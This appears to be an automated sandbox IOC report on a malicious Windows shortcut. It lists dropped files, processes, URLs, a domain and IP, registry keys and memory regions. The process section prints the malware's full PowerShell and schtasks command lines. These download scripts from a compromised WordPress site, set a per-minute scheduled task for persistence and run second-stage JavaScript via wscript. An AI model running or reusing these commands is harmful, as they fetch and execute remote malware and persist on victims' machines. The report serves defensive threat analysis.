IOC Report
mX3IqRiuFo.lnk

loading gif

Files

File Path
Type
Category
Malicious
mX3IqRiuFo.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:54 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js
ASCII text, with CRLF line terminators
dropped
malicious
C:\ProgramData\241XU6KV2DFH.js
ASCII text, with very long lines (398)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gl1kgu4.kqv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f45x0lb5.rzu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4f3pmi2.zdk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa5gjzmm.aew.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvhvl0nc.y0a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0otm22q.hkd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybs0whv4.vlc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5llsei5.crc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5e80ae42b9d74ef9.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AA3SPT5ZBVZTL0B9KYES.temp
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.italialife24.it
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
46.254.34.201
malicious
https://www.italialife24.it/
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/0
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
46.254.34.201
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.ph
unknown
malicious
https://www.italialife24.it/wp-content
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/a
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
46.254.34.201
malicious
https://www.italialife24.it/wp-c
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phpr
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
unknown
https://go.micro
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/unt
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://github.com/Pester/Pester
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
unknown
http://www.microsoft.co)
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
unknown
https://aka.ms/pscore68
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
https://oneget.org
unknown
http://italialife24.it
unknown
http://www.italialife24.it
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
unknown
There are 25 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
italialife24.it
46.254.34.201
malicious
www.italialife24.it
unknown
malicious

IPs

IP
Domain
Country
Malicious
46.254.34.201
italialife24.it
Italy
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
26617450000
heap
page read and write
1EE7BC97000
heap
page read and write
214BC994000
trusted library allocation
page read and write
15252A04000
trusted library allocation
page read and write
15252C60000
trusted library allocation
page read and write
7FFD349E0000
trusted library allocation
page read and write
199EC897000
heap
page execute and read and write
199EA787000
heap
page read and write
110077F000
stack
page read and write
152696FF000
heap
page read and write
199EC1A5000
heap
page read and write
AB4444E000
stack
page read and write
2661548F000
heap
page read and write
7FFD348B0000
trusted library allocation
page execute and read and write
201046F2000
heap
page read and write
7FFD34866000
trusted library allocation
page execute and read and write
26618B68000
trusted library allocation
page read and write
1F0C41B0000
heap
page read and write
7FFD34794000
trusted library allocation
page read and write
199EA665000
heap
page read and write
1D583B3F000
heap
page read and write
266172ED000
heap
page read and write
19E82E46000
heap
page read and write
199EC730000
trusted library allocation
page read and write
19E82E4C000
heap
page read and write
214BDF03000
trusted library allocation
page read and write
266191AE000
trusted library allocation
page read and write
7FFD34A20000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page execute and read and write
E0B50FD000
stack
page read and write
AB43379000
stack
page read and write
1EE7D730000
heap
page read and write
27145D60000
heap
page read and write
19E82FC5000
heap
page read and write
266181BD000
trusted library allocation
page read and write
201046A9000
heap
page read and write
AB4420D000
stack
page read and write
7FFD349E0000
trusted library allocation
page read and write
7FFD34970000
trusted library allocation
page execute and read and write
199EA78D000
heap
page read and write
214D4C0B000
heap
page read and write
266173D0000
heap
page read and write
27675378000
heap
page read and write
1525203C000
trusted library allocation
page read and write
7FFD34980000
trusted library allocation
page read and write
26618B93000
trusted library allocation
page read and write
19E82E1E000
heap
page read and write
1524F6A5000
heap
page read and write
1D583B0B000
heap
page read and write
214BA87F000
heap
page read and write
11006FD000
stack
page read and write
214BA8B8000
heap
page read and write
214BDF0A000
trusted library allocation
page read and write
1EE7BCD8000
heap
page read and write
15269766000
heap
page read and write
15252A18000
trusted library allocation
page read and write
26615605000
heap
page read and write
2C685D50000
heap
page read and write
19981757000
trusted library allocation
page read and write
B788EFE000
stack
page read and write
26617606000
trusted library allocation
page read and write
AB4353B000
stack
page read and write
201046D2000
heap
page read and write
199EA660000
heap
page read and write
1D583B0B000
heap
page read and write
152529FC000
trusted library allocation
page read and write
1D583B67000
heap
page read and write
15B0FA49000
heap
page read and write
AB430FE000
stack
page read and write
1D583B3D000
heap
page read and write
199EC5D3000
trusted library allocation
page read and write
2662F7C1000
heap
page read and write
7FFD3482C000
trusted library allocation
page execute and read and write
1D583B01000
heap
page read and write
1526971D000
heap
page read and write
14E61F6000
stack
page read and write
15B0FC55000
heap
page read and write
19E82DEA000
heap
page read and write
14E6179000
stack
page read and write
1524F650000
heap
page readonly
201046D6000
heap
page read and write
19981664000
trusted library allocation
page read and write
796C5FF000
stack
page read and write
CA9DAFF000
stack
page read and write
2FD4BFE000
stack
page read and write
19980233000
trusted library allocation
page read and write
756B4FE000
stack
page read and write
7FFD349F0000
trusted library allocation
page read and write
15B0FC5D000
heap
page read and write
1100978000
stack
page read and write
AB4363E000
stack
page read and write
2010472A000
heap
page read and write
214BAA60000
heap
page read and write
7FFD34A60000
trusted library allocation
page read and write
1D583B55000
heap
page read and write
15B0FA19000
heap
page read and write
1998008B000
trusted library allocation
page read and write
BFD7FFF000
stack
page read and write
7FFD34AB0000
trusted library allocation
page read and write
199EC84B000
heap
page read and write
15252A1A000
trusted library allocation
page read and write
19E82E33000
heap
page read and write
201046D2000
heap
page read and write
2662F7B7000
heap
page read and write
7FFD34940000
trusted library allocation
page execute and read and write
1EE7DB70000
heap
page read and write
7DF434F10000
trusted library allocation
page execute and read and write
BFD7DFE000
stack
page read and write
214BA850000
heap
page read and write
7FFD34890000
trusted library allocation
page execute and read and write
214BC3E0000
heap
page execute and read and write
BFD7909000
stack
page read and write
152696C0000
heap
page read and write
AB43438000
stack
page read and write
1525139E000
heap
page read and write
7FFD34876000
trusted library allocation
page execute and read and write
796C877000
stack
page read and write
214D4AF0000
heap
page read and write
19E82E33000
heap
page read and write
214BAAA0000
trusted library allocation
page read and write
1EE7BC8C000
heap
page read and write
266275A1000
trusted library allocation
page read and write
201046CE000
heap
page read and write
19981675000
trusted library allocation
page read and write
7FFD34A60000
trusted library allocation
page read and write
19E82DEF000
heap
page read and write
276752D0000
heap
page read and write
1EE7BCB8000
heap
page read and write
199901B0000
trusted library allocation
page read and write
1D583B01000
heap
page read and write
202819A0000
heap
page read and write
202819B1000
heap
page read and write
19E82E33000
heap
page read and write
19981699000
trusted library allocation
page read and write
14E627B000
stack
page read and write
7FFD3492A000
trusted library allocation
page read and write
110188C000
stack
page read and write
7FFD3478B000
trusted library allocation
page read and write
2662F78D000
heap
page read and write
7FFD34AA0000
trusted library allocation
page read and write
214BA820000
heap
page read and write
7FFD34A90000
trusted library allocation
page read and write
15269757000
heap
page read and write
7FFD34AA0000
trusted library allocation
page read and write
AB4373B000
stack
page read and write
26618B96000
trusted library allocation
page read and write
1525136D000
heap
page read and write
199EC990000
heap
page read and write
199EA630000
heap
page read and write
27145DB8000
heap
page read and write
214D4C05000
heap
page read and write
2C685D60000
heap
page read and write
201046A2000
heap
page read and write
14E704D000
stack
page read and write
14E62F7000
stack
page read and write
214D49D9000
heap
page read and write
26618B7A000
trusted library allocation
page read and write
7FFD34A00000
trusted library allocation
page read and write
20104704000
heap
page read and write
214BDF14000
trusted library allocation
page read and write
19E82E0D000
heap
page read and write
1EE7BC60000
heap
page read and write
7FFD34784000
trusted library allocation
page read and write
199EA6B0000
heap
page read and write
19981A12000
trusted library allocation
page read and write
199ECA90000
heap
page read and write
19E82E3D000
heap
page read and write
19980001000
trusted library allocation
page read and write
2010470F000
heap
page read and write
7FFD34AC0000
trusted library allocation
page read and write
214CCBEE000
trusted library allocation
page read and write
214BDF63000
trusted library allocation
page read and write
15B0FA00000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
19981671000
trusted library allocation
page read and write
214BA870000
heap
page read and write
26617550000
heap
page execute and read and write
1D583B8C000
heap
page read and write
15269550000
heap
page read and write
214D4C15000
heap
page read and write
1100AFE000
stack
page read and write
20281A17000
heap
page read and write
CA9D7AB000
stack
page read and write
7FFD34A40000
trusted library allocation
page read and write
AB4434C000
stack
page read and write
14BBAFE000
stack
page read and write
202819CB000
heap
page read and write
14E5CFE000
stack
page read and write
20281950000
heap
page read and write
7FFD34A20000
trusted library allocation
page read and write
7FFD34780000
trusted library allocation
page read and write
19990010000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page execute and read and write
756BBFF000
stack
page read and write
1EE7BCCA000
heap
page read and write
202819F5000
heap
page read and write
2661545F000
heap
page read and write
1F0C4294000
heap
page read and write
26616F06000
heap
page execute and read and write
214BC370000
heap
page read and write
20104600000
heap
page read and write
152696F3000
heap
page read and write
1D583B79000
heap
page read and write
201046FC000
heap
page read and write
7FFD34850000
trusted library allocation
page execute and read and write
7FFD34922000
trusted library allocation
page read and write
7FFD34920000
trusted library allocation
page read and write
199EA670000
heap
page read and write
214D4C2B000
heap
page read and write
27675550000
heap
page read and write
BFD83FE000
stack
page read and write
214D4BD0000
heap
page read and write
15269630000
heap
page execute and read and write
14BBFFF000
stack
page read and write
7FFD34773000
trusted library allocation
page execute and read and write
199EA7CF000
heap
page read and write
7FFD34990000
trusted library allocation
page read and write
2FD4CFE000
stack
page read and write
98470FF000
stack
page read and write
214BA8F5000
heap
page read and write
7FFD34912000
trusted library allocation
page read and write
7FFD34A50000
trusted library allocation
page read and write
199EC740000
heap
page execute and read and write
7FFD34AB0000
trusted library allocation
page read and write
B788FFE000
stack
page read and write
7FFD34980000
trusted library allocation
page read and write
20281A0B000
heap
page read and write
796C57F000
stack
page read and write
1EE7BCAE000
heap
page read and write
15B0F9FC000
heap
page read and write
7FFD34820000
trusted library allocation
page read and write
201046BE000
heap
page read and write
20104719000
heap
page read and write
7FFD34A8B000
trusted library allocation
page read and write
2339A79000
stack
page read and write
199EC846000
heap
page read and write
266153E0000
heap
page read and write
1998164D000
trusted library allocation
page read and write
199EA795000
heap
page read and write
1524F5E0000
heap
page read and write
BFD82FE000
stack
page read and write
1524F4FD000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
1524F50D000
heap
page read and write
26615420000
trusted library allocation
page read and write
266191B2000
trusted library allocation
page read and write
1D583B1D000
heap
page read and write
266154AF000
heap
page read and write
7FFD349C0000
trusted library allocation
page read and write
110030E000
stack
page read and write
1524F3A0000
heap
page read and write
26617320000
heap
page read and write
26615517000
heap
page read and write
B5F04FF000
unkown
page read and write
7FFD3483C000
trusted library allocation
page execute and read and write
19981700000
trusted library allocation
page read and write
15B0F9D7000
heap
page read and write
1EE7BCBB000
heap
page read and write
20104704000
heap
page read and write
19E82E6B000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
AB432FD000
stack
page read and write
20106503000
heap
page read and write
214D492B000
heap
page read and write
202819A8000
heap
page read and write
1EE7BEE5000
heap
page read and write
26617352000
heap
page read and write
214D4AD0000
heap
page read and write
214D4AC0000
heap
page execute and read and write
214BDC60000
trusted library allocation
page read and write
1524F660000
trusted library allocation
page read and write
20104674000
heap
page read and write
19E82FC0000
heap
page read and write
2010469D000
heap
page read and write
14E5D7E000
stack
page read and write
1D583AC5000
heap
page read and write
214BAAE0000
trusted library allocation
page read and write
20281BC0000
heap
page read and write
2FD458A000
stack
page read and write
201046B6000
heap
page read and write
14BBEFF000
stack
page read and write
199EC795000
heap
page read and write
20104670000
heap
page read and write
199816BA000
trusted library allocation
page read and write
7FFD34A80000
trusted library allocation
page read and write
152696FA000
heap
page read and write
199EC180000
trusted library allocation
page read and write
26618B82000
trusted library allocation
page read and write
214BA8AE000
heap
page read and write
7FFD3492A000
trusted library allocation
page read and write
7FFD34A00000
trusted library allocation
page read and write
271460F5000
heap
page read and write
7FFD3482C000
trusted library allocation
page execute and read and write
214BC420000
heap
page read and write
19E82E6B000
heap
page read and write
796D7CF000
stack
page read and write
1F0C40B7000
heap
page read and write
110190C000
stack
page read and write
B7895FE000
stack
page read and write
1D583B3E000
heap
page read and write
26615593000
trusted library allocation
page read and write
1D583B39000
heap
page read and write
214D4C17000
heap
page read and write
214D49DD000
heap
page read and write
AB42DDF000
stack
page read and write
19E82E3D000
heap
page read and write
7FFD349A0000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page read and write
266190E8000
trusted library allocation
page read and write
19E82E1B000
heap
page read and write
20108020000
trusted library allocation
page read and write
15252A22000
trusted library allocation
page read and write
26615380000
heap
page read and write
1EE7BD04000
heap
page read and write
1D583B0A000
heap
page read and write
B5F047B000
stack
page read and write
201046AC000
heap
page read and write
15B0F9D7000
heap
page read and write
7FFD34932000
trusted library allocation
page read and write
796D84E000
stack
page read and write
1100BFB000
stack
page read and write
1D5839E0000
heap
page read and write
214BE545000
trusted library allocation
page read and write
7FFD34890000
trusted library allocation
page execute and read and write
19E82DC7000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
26615497000
heap
page read and write
7FFD34A10000
trusted library allocation
page read and write
15261421000
trusted library allocation
page read and write
2339AFE000
unkown
page read and write
214BE541000
trusted library allocation
page read and write
110174D000
stack
page read and write
7FFD348A0000
trusted library allocation
page execute and read and write
2C686095000
heap
page read and write
26616F10000
heap
page read and write
1D583A00000
heap
page read and write
27675555000
heap
page read and write
7FFD34960000
trusted library allocation
page execute and read and write
AB434B8000
stack
page read and write
1D583B55000
heap
page read and write
AB4307F000
stack
page read and write
AB433BF000
stack
page read and write
796C77D000
stack
page read and write
26615590000
trusted library allocation
page read and write
199EC61F000
heap
page read and write
214BA963000
heap
page read and write
201046FC000
heap
page read and write
AB443CC000
stack
page read and write
1524F507000
heap
page read and write
199EC190000
heap
page read and write
15B0F950000
heap
page read and write
E0B479A000
stack
page read and write
7FFD3477D000
trusted library allocation
page execute and read and write
201046FC000
heap
page read and write
E0B4DFF000
stack
page read and write
214BA8B4000
heap
page read and write
796C67D000
stack
page read and write
19E82E42000
heap
page read and write
7FFD349C0000
trusted library allocation
page read and write
202819D0000
heap
page read and write
7FFD3493A000
trusted library allocation
page read and write
20104680000
heap
page read and write
14E64FE000
stack
page read and write
7FFD34A60000
trusted library allocation
page read and write
B7891FF000
stack
page read and write
1D583AFC000
heap
page read and write
1EE7BCC1000
heap
page read and write
2662F798000
heap
page read and write
1EE7BC97000
heap
page read and write
20106500000
heap
page read and write
214D4BF6000
heap
page read and write
15251300000
heap
page read and write
1D583B37000
heap
page read and write
15B0F9A0000
heap
page read and write
19E82DF6000
heap
page read and write
B7893FE000
stack
page read and write
19E867C0000
trusted library allocation
page read and write
1998166D000
trusted library allocation
page read and write
1EE7BD07000
heap
page read and write
1524F725000
heap
page read and write
B7892FE000
stack
page read and write
7FFD34780000
trusted library allocation
page read and write
201046DE000
heap
page read and write
1D587340000
trusted library allocation
page read and write
7FFD34AB0000
trusted library allocation
page read and write
201046CE000
heap
page read and write
1EE7BCD8000
heap
page read and write
199EC750000
heap
page read and write
214BDF2A000
trusted library allocation
page read and write
14E647E000
stack
page read and write
1526941C000
heap
page read and write
756B1D9000
stack
page read and write
BFD7CFE000
stack
page read and write
1524F720000
heap
page read and write
19E82DA0000
heap
page read and write
1D583B55000
heap
page read and write
199EA769000
heap
page read and write
7FFD34AC0000
trusted library allocation
page read and write
7FFD34931000
trusted library allocation
page read and write
7FFD34AC0000
trusted library allocation
page read and write
199EA640000
heap
page read and write
7FFD34826000
trusted library allocation
page read and write
20104920000
heap
page read and write
26617591000
trusted library allocation
page read and write
19E82E3D000
heap
page read and write
20104704000
heap
page read and write
1F0C41D0000
heap
page read and write
1524F4E7000
heap
page read and write
7FFD34990000
trusted library allocation
page read and write
11009FA000
stack
page read and write
14BB9FE000
stack
page read and write
152513D3000
heap
page read and write
11007FE000
stack
page read and write
1524F4C0000
heap
page read and write
20104704000
heap
page read and write
26618B9E000
trusted library allocation
page read and write
1D583B4F000
heap
page read and write
7FFD34AE0000
trusted library allocation
page read and write
19E82E0E000
heap
page read and write
1EE7BD04000
heap
page read and write
AB4418E000
stack
page read and write
AB435BE000
stack
page read and write
1998189C000
trusted library allocation
page read and write
27145DB0000
heap
page read and write
7FFD3479B000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page read and write
201046F2000
heap
page read and write
19E82DEF000
heap
page read and write
7FFD3478D000
trusted library allocation
page execute and read and write
1EE7BC30000
heap
page read and write
1D583B5E000
heap
page read and write
20107F00000
heap
page read and write
14E59EE000
stack
page read and write
214BDF16000
trusted library allocation
page read and write
1524F480000
heap
page read and write
199ECADF000
heap
page read and write
214D4FC0000
heap
page read and write
199EA793000
heap
page read and write
7FFD34A20000
trusted library allocation
page read and write
AB4317D000
stack
page read and write
14E5EFE000
stack
page read and write
199803F0000
trusted library allocation
page read and write
1525163C000
trusted library allocation
page read and write
19E82E33000
heap
page read and write
20104706000
heap
page read and write
1D583B5E000
heap
page read and write
152529EA000
trusted library allocation
page read and write
19990001000
trusted library allocation
page read and write
26615450000
heap
page read and write
7FFD34970000
trusted library allocation
page read and write
7FFD34A20000
trusted library allocation
page read and write
756B7FF000
stack
page read and write
14E6FCE000
stack
page read and write
796CC3B000
stack
page read and write
20281BCC000
heap
page read and write
271460F0000
heap
page read and write
15253032000
trusted library allocation
page read and write
7FFD34774000
trusted library allocation
page read and write
1524F6E3000
trusted library allocation
page read and write
15251380000
heap
page read and write
1524F544000
heap
page read and write
20104704000
heap
page read and write
15252752000
trusted library allocation
page read and write
7FFD34AC0000
trusted library allocation
page read and write
201046C0000
heap
page read and write
7FFD3484C000
trusted library allocation
page execute and read and write
CA9DA7E000
unkown
page read and write
796C939000
stack
page read and write
7FFD34990000
trusted library allocation
page read and write
110198E000
stack
page read and write
7FFD34790000
trusted library allocation
page read and write
7FFD34972000
trusted library allocation
page read and write
7FFD34AA0000
trusted library allocation
page read and write
199EC1A0000
heap
page read and write
AB4424F000
stack
page read and write
1D587220000
heap
page read and write
214D4C1C000
heap
page read and write
2C686090000
heap
page read and write
796D74F000
stack
page read and write
1EE7BEE0000
heap
page read and write
BFD81FE000
stack
page read and write
1524F6E0000
trusted library allocation
page read and write
1D583B62000
heap
page read and write
7FFD34AD0000
trusted library allocation
page read and write
19E848B4000
heap
page read and write
796C8BE000
stack
page read and write
15251382000
heap
page read and write
201046AA000
heap
page read and write
2662F760000
heap
page read and write
201046AC000
heap
page read and write
19E82E3D000
heap
page read and write
7FFD34952000
trusted library allocation
page read and write
199EC9B0000
heap
page read and write
201046DE000
heap
page read and write
15252C8B000
trusted library allocation
page read and write
1D585534000
heap
page read and write
B5F057F000
stack
page read and write
19981C71000
trusted library allocation
page read and write
14E5DFE000
stack
page read and write
15252A16000
trusted library allocation
page read and write
19E82E0C000
heap
page read and write
1D583B71000
heap
page read and write
20104704000
heap
page read and write
7FFD34960000
trusted library allocation
page execute and read and write
199EC590000
heap
page readonly
7FFD34856000
trusted library allocation
page execute and read and write
7FFD349F0000
trusted library allocation
page read and write
7FFD34A30000
trusted library allocation
page read and write
26618DE1000
trusted library allocation
page read and write
1524F620000
trusted library allocation
page read and write
199EA71A000
heap
page read and write
19E82E33000
heap
page read and write
214BDF65000
trusted library allocation
page read and write
1D583B0B000
heap
page read and write
199818C7000
trusted library allocation
page read and write
19E82DE2000
heap
page read and write
26618795000
trusted library allocation
page read and write
7FFD34846000
trusted library allocation
page read and write
199EA7D1000
heap
page read and write
E0B4BFE000
stack
page read and write
19E866A0000
heap
page read and write
266172B0000
heap
page read and write
15252A12000
trusted library allocation
page read and write
19E82E1E000
heap
page read and write
110178F000
stack
page read and write
214D4BD9000
heap
page read and write
152696B0000
heap
page execute and read and write
7FFD34A70000
trusted library allocation
page read and write
19981BA7000
trusted library allocation
page read and write
199EC834000
heap
page read and write
2010470B000
heap
page read and write
756BAFE000
stack
page read and write
20104704000
heap
page read and write
199EA75B000
heap
page read and write
7FFD34921000
trusted library allocation
page read and write
201046AC000
heap
page read and write
1525130C000
heap
page read and write
15251400000
heap
page read and write
1EE7BCD8000
heap
page read and write
796C473000
stack
page read and write
7FFD34910000
trusted library allocation
page read and write
26618B64000
trusted library allocation
page read and write
796C6FE000
stack
page read and write
152696C8000
heap
page read and write
7FFD34A50000
trusted library allocation
page read and write
19E82DDD000
heap
page read and write
199EC78B000
heap
page read and write
7FFD34A70000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page read and write
199EA789000
heap
page read and write
2339B7E000
stack
page read and write
214BE2E8000
trusted library allocation
page read and write
214BCB4B000
trusted library allocation
page read and write
BFD80FE000
stack
page read and write
199EA6E0000
heap
page read and write
796D8CB000
stack
page read and write
276752F0000
heap
page read and write
7FFD34980000
trusted library allocation
page read and write
19E82FD0000
heap
page read and write
202819D0000
heap
page read and write
2C685DD8000
heap
page read and write
202819F5000
heap
page read and write
201046D2000
heap
page read and write
20106508000
heap
page read and write
214BDEFA000
trusted library allocation
page read and write
7FFD3477D000
trusted library allocation
page execute and read and write
15B115F0000
heap
page read and write
214D496F000
heap
page read and write
26618B8F000
trusted library allocation
page read and write
796CB3E000
stack
page read and write
2FD4EFE000
stack
page read and write
1EE7BD04000
heap
page read and write
214BAB45000
heap
page read and write
7FFD34793000
trusted library allocation
page execute and read and write
796C9B8000
stack
page read and write
266275FE000
trusted library allocation
page read and write
214BA878000
heap
page read and write
1526975D000
heap
page read and write
7FFD34A3D000
trusted library allocation
page read and write
1100282000
stack
page read and write
7FFD34930000
trusted library allocation
page execute and read and write
E0B53FB000
stack
page read and write
14BBDFF000
stack
page read and write
7FFD34826000
trusted library allocation
page read and write
20104610000
heap
page read and write
201046A2000
heap
page read and write
26618E0D000
trusted library allocation
page read and write
796C4FE000
stack
page read and write
15B0F980000
heap
page read and write
2FD4DFE000
stack
page read and write
1F0C40B0000
heap
page read and write
7FFD34A70000
trusted library allocation
page read and write
19E82E1D000
heap
